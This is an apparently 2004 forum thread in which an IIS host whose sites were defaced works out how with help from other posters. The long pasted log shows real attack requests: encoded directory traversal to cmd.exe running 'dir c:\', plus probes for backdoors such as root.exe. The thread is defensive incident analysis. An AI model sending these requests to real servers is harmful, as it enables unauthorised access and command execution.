Sites Hacked - No Traces 2

[JordanR]

Hello,
This passed weekend 4 websites that I host had been hacked somehow. The only thing that I found was that the hacker changed to the index.asp files to say "triad". Has this happend to anyone else? How can I find out how this happened and what to do from preventing this from happening again.
I do have a firewall appliance that gave no indication of a hack attack and the event log mentions nothing of the sort.

TIA,
Jordan

 

[MichealC4]

Guessing since you have index.asp files, IIS, yes?

Let's start with what you do know. You do know that there was a defacement of at least 4 websites. You do know that the attacker left the calling card "triad." It is almost 1 am here, so unfortunately I can't do a whole lot of checking around, but calling cards left can help you in a variety of ways, including telling you how they got in. Typically these calling cards are the name of the person/group that did the attack. With that, you can search around (there are several sites that keep databases of who did what defacement), and many times you can get an idea as to who specializes in what kind of attack. Maybe it was an attack on software you run on those websites. Maybe it was an attack in a buffer overflow vulnerability in the .idq mappings (which shouldn't be there anyway ). Also, calling cards can also be "shoutouts" to friends, or someone/group they look up to. Maybe the calling card is a "hi" to a well-known attacker, and that's the kind of attacks that well-known attacker launched.

Now, to get away from the calling card as it could be something, it could be nothing. What does your IIS access logs tell you? I didn't see you mention those. Perhaps they used a unicode directory traversal to launch tftp.exe and grab a file manager.

I have more to say, but as I said, it is late (or rather early ) here, so my ramblings won't really be of much help to you right now, but hopefully the above will get you started.

----------------------------
"Security is like an onion" - Unknown

 

[JordanR]

I haven't checked the IIS logs yet. I will do that in the morning. I will let you know what I find.
Thanks

 

[chiph]

Since you know you were hacked, I would say you can no longer trust any of the data on those PCs. Time to burn what you can save to a CDR, and reinstall the OS.

Make sure you have downloaded the service packs via a known clean PC -- The survival time of an unpatched Windows machine is now under 5 minutes (in other words: too short a time period to be downloading patches from WindowsUpdate).

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first

 

[MichealC4]

chiph: I agree with you, but I was under the impression that he wanted to find out what happened so he can prevent it in the future, be it a vulnerable webapp a customer was running, unpatched server, etc. Of course he'll want to take it offline.

----------------------------
"Security is like an onion" - Unknown

 

[JordanR]

I have found in the default IIS logs some lines that look like hacker activity. I will post a part later for you guys to view.
I didn't know I was going to have to reinstall the OS.

 

[MichealC4]

JordanR: It is best to in a case like this as you can never be sure what the attacker did. Please do post the IIS logs when you get a chance.

----------------------------
"Security is like an onion" - Unknown

 

[JordanR]

Here is the part of the IIS Log that seem suspicious, I have replaced the computer's IP with xxx.xxx.xxx.xx

2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:14 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:15 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:16 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:17 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /c/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:18 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /d/winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:20 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msaDC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:21 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:22 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:23 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..o../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..Á%pc../..Á%pc../..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:24 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:25 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 403 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:27 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:28 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..À%9v../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:29 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..À%qf../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á%8s../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:30 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..Á%pc../winnt/system32/cmd.exe /c+dir+c:\ 500 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:31 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/win32.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:32 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/test.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/sys.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/superlol.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/some.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:33 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/shell.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/serverdata.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/sensepost.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/monkey.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/lol.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:34 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/line.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/fun.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/exchange.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/echo.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/eXe.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:35 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/cmd2.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/cmd1.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/bs.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/boot.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/az.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:37 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/Serverdata.exe /c+dir+c:\ 404 Mozilla/??
2004-12-05 08:27:38 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/root.exe /c+dir+c:\ 404 Mozilla/??

 

[JordanR]

forgot the last piece.

Mozilla/??
2004-12-05 08:27:38 24.198.58.220 - xxx.xxx.xxx.xx 80 GET /scripts/root.exe /c+dir+c:\ 404 Mozilla/??

 

[MichealC4]

Unless they were able to get through anyway (which is possible, I have never tested this on IIS, so I'm not sure what the result is), I don't see anything that succeeded.

A general idea of what happened from the sample of your logs:

The attacker used a mix of special characters and unicode to traverse up the directory to get to cmd.exe to get a directory listing of C:. They also searched for active backdoors, root.exe being among them and from Code Red II. Unicode directory traversal is effective and quite deadly. However, I do not see evidence of defacement, unless they found a backdoor and used that.

----------------------------
"Security is like an onion" - Unknown

 

[JordanR]

So, do you think I should still reinstall the OS?
I haven't rebooted the server from the last Update this past Sunday. Will that help?

 

[chiph]

The big question is all the unknowns -- since they changed something on the site, you know they got at least part way in. What you don't know is where else on the machine (or local subnet) they went to. It doesn't look like they altered the IIS log (otherwise they would have removed all their false starts), so if you scroll further down in the file, you might be able to see where they successfully got in (where they stopped getting 404s and 500s).

Chip H.


____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first

 

[JordanR]

I didn't find where the 24.198.58.220 had any success but I did find the following

2004-12-05 17:32:12 172.142.129.96 - 192.168.100.68 80 GET /iisstart.asp - 200 waol.exe

does this look like a successful hack or a hack at all?
what does 200 mean?

 

[chiph]

200 is a success code.

They were able to view the iisstart.asp page. This is one of the default pages that comes with IIS. When you rebuild your machine, you should make sure all that stuff gets deleted before you put your site(s) back on. It's a bad idea to leave that stuff laying around -- I don't know if there's a specific attack via them, but best to be safe.

Chip H.

____________________________________________________________________
If you want to get the best response to a question, please read FAQ222-2244 first

 

[MichealC4]

There's some chunked-encoding vulnerabilities with iisstart.asp, at least that I can find. No doubt there are others.

----------------------------
"Security is like an onion" - Unknown

 

[JordanR]

Could someone explain what this line means:
2004-12-10 11:39:46 211.186.3.250 - 192.168.100.68 80 OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600

Also, is there a tutorial somewhere on how to read the log files?

TIA

 

[MichealC4]

It means someone from 211.186.3.250 connecting to IP 192.168.100.68 to port 80 used WebDAV on Windows XP to get the OPTIONS list from your server.

http://www.webdav.org/

for more information.

As for reading log files, I just learned by trial and error (and am still learning).

However, try these on for size:

http://slis-two.lis.fsu.edu/~log/

http://internetmarketingengine.com/how-to-read-server-log-files.htm

----------------------------
"Security is like an onion" - Unknown